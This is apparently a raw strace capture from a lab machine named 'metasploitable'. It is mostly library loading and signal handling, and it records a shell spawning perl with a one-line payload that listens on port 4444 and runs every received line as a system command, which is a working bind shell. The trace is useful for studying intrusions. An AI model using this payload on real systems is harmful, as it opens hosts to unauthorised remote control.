13067 07:45:30.743216 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

13067 07:45:30.743302 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

13067 07:45:30.743319 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7df7000

13067 07:45:30.743330 mmap2(0xb7dff000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7dff000

13067 07:45:30.743346 close(1)          = 0

13067 07:45:30.743369 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13067 07:45:30.743408 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

13067 07:45:30.743423 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

13067 07:45:30.743524 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

13067 07:45:30.743540 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dec000

13067 07:45:30.743552 mmap2(0xb7df5000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7df5000

13067 07:45:30.743568 close(1)          = 0

13067 07:45:30.743589 munmap(0xb7fa7000, 29913) = 0

13067 07:45:30.743604 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

13067 07:45:30.743621 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

13067 07:45:30.743632 _llseek(1, 0, [0], SEEK_CUR) = 0

13067 07:45:30.743644 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

13067 07:45:30.743659 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7fae000

13067 07:45:30.743670 _llseek(1, 1624, [1624], SEEK_SET) = 0

13067 07:45:30.743684 munmap(0xb7fae000, 1624) = 0

13067 07:45:30.743694 close(1)          = 0

13067 07:45:30.743721 getpgrp()         = 3831

13067 07:45:30.743731 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

13067 07:45:30.743746 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

13067 07:45:30.743761 brk(0x8101000)    = 0x8101000

13067 07:45:30.743791 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

13067 07:45:30.743805 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

13067 07:45:30.743819 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

13067 07:45:30.743868 brk(0x8102000)    = 0x8102000

13067 07:45:30.743942 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

13067 07:45:30.743979 stat64("/sbin/AB", 0xbff21d78) = -1 ENOENT (No such file or directory)

13067 07:45:30.743991 stat64("/bin/AB", 0xbff21d78) = -1 ENOENT (No such file or directory)

13067 07:45:30.744001 stat64("/usr/sbin/AB", 0xbff21d78) = -1 ENOENT (No such file or directory)

13067 07:45:30.744013 stat64("/usr/bin/AB", 0xbff21d78) = -1 ENOENT (No such file or directory)

13067 07:45:30.744026 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

13067 07:45:30.744040 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e226f8) = 13068

13068 07:45:30.744084 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

13068 07:45:30.744100 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

13068 07:45:30.744112 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

13068 07:45:30.744124 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

13068 07:45:30.744139 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

13068 07:45:30.744154 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

13068 07:45:30.744167 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

13068 07:45:30.744220 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

13068 07:45:30.744233 --- SIGPIPE (Broken pipe) @ 0 (0) ---

13068 07:45:30.744296 exit_group(127)   = ?

13067 07:45:30.760484 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

13067 07:45:30.760485 --- SIGCHLD (Child exited) @ 0 (0) ---

13067 07:45:30.760485 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 13068

13067 07:45:30.760485 waitpid(-1,  <unfinished ...>

4519  07:45:30.760485 waitpid(13067,  <unfinished ...>

13067 07:45:30.760494 <... waitpid resumed> 0xbff219f8, WNOHANG) = -1 ECHILD (No child processes)

13067 07:45:30.760503 sigreturn()       = ? (mask now [])

13067 07:45:30.760526 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

13067 07:45:30.760541 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

13067 07:45:30.760552 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

13067 07:45:30.760564 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

13067 07:45:30.760583 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

13067 07:45:30.760594 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

13067 07:45:30.760629 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

13067 07:45:30.760649 stat64("/sbin/perl", 0xbff21da8) = -1 ENOENT (No such file or directory)

13067 07:45:30.760661 stat64("/bin/perl", 0xbff21da8) = -1 ENOENT (No such file or directory)

13067 07:45:30.760673 stat64("/usr/sbin/perl", 0xbff21da8) = -1 ENOENT (No such file or directory)

13067 07:45:30.760685 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

13067 07:45:30.760703 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

13067 07:45:30.760727 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

13067 07:45:30.760742 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e226f8) = 13069

13069 07:45:30.760788 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

13069 07:45:30.760820 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

13069 07:45:30.760860 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

13069 07:45:30.760873 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

13069 07:45:30.760902 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

13069 07:45:30.760918 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

13069 07:45:30.760931 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

13069 07:45:30.760964 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

13069 07:45:30.761052 brk(0)            = 0x8153000

13069 07:45:30.761073 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13069 07:45:30.761088 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdd000

13069 07:45:30.761103 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

13069 07:45:30.761120 open("/etc/ld.so.cache", O_RDONLY) = 1

13069 07:45:30.761132 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

13069 07:45:30.761149 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fd5000

13069 07:45:30.761159 close(1)          = 0

13069 07:45:30.761170 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13069 07:45:30.761186 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

13069 07:45:30.761202 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

13069 07:45:30.761306 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

13069 07:45:30.761352 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fd1000

13069 07:45:30.761365 mmap2(0xb7fd3000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7fd3000

13069 07:45:30.761395 close(1)          = 0

13069 07:45:30.761407 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13069 07:45:30.761421 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

13069 07:45:30.761435 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

13069 07:45:30.761527 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

13069 07:45:30.761544 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fac000

13069 07:45:30.761555 mmap2(0xb7fcf000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7fcf000

13069 07:45:30.761571 close(1)          = 0

13069 07:45:30.761582 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13069 07:45:30.761597 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

13069 07:45:30.761611 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

13069 07:45:30.761697 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

13069 07:45:30.761714 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fab000

13069 07:45:30.761727 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f93000

13069 07:45:30.761738 mmap2(0xb7fa7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7fa7000

13069 07:45:30.761752 mmap2(0xb7fa9000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fa9000

13069 07:45:30.761766 close(1)          = 0

13069 07:45:30.761777 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13069 07:45:30.761801 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

13069 07:45:30.761843 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

13069 07:45:30.761950 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

13069 07:45:30.761968 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e44000

13069 07:45:30.761979 mmap2(0xb7f8d000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f8d000

13069 07:45:30.761997 mmap2(0xb7f90000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f90000

13069 07:45:30.762010 close(1)          = 0

13069 07:45:30.762022 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

13069 07:45:30.762035 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

13069 07:45:30.762050 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

13069 07:45:30.762139 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

13069 07:45:30.762156 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e12000

13069 07:45:30.762167 mmap2(0xb7e1b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7e1b000

13069 07:45:30.762182 mmap2(0xb7e1d000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e1d000

13069 07:45:30.762195 close(1)          = 0

13069 07:45:30.762218 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e11000

13069 07:45:30.762231 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e118c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

13069 07:45:30.762284 mprotect(0xb7f8d000, 4096, PROT_READ) = 0

13069 07:45:30.762284 munmap(0xb7fd5000, 29913) = 0

13069 07:45:30.762285 set_tid_address(0xb7e11908) = 13069

13069 07:45:30.762285 set_robust_list(0xb7e11910, 0xc) = 0

13069 07:45:30.762285 futex(0xbfd86a20, 0x81 /* FUTEX_??? */, 1) = 0

13069 07:45:30.762285 rt_sigaction(SIGRTMIN, {0xb7f972c0, [], SA_SIGINFO}, NULL, 8) = 0

13069 07:45:30.762285 rt_sigaction(SIGRT_1, {0xb7f97340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

13069 07:45:30.762286 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

13069 07:45:30.762286 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

13069 07:45:30.762286 uname({sys="Linux", node="metasploitable", ...}) = 0

13069 07:45:30.762286 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

13069 07:45:30.762287 brk(0)            = 0x8153000

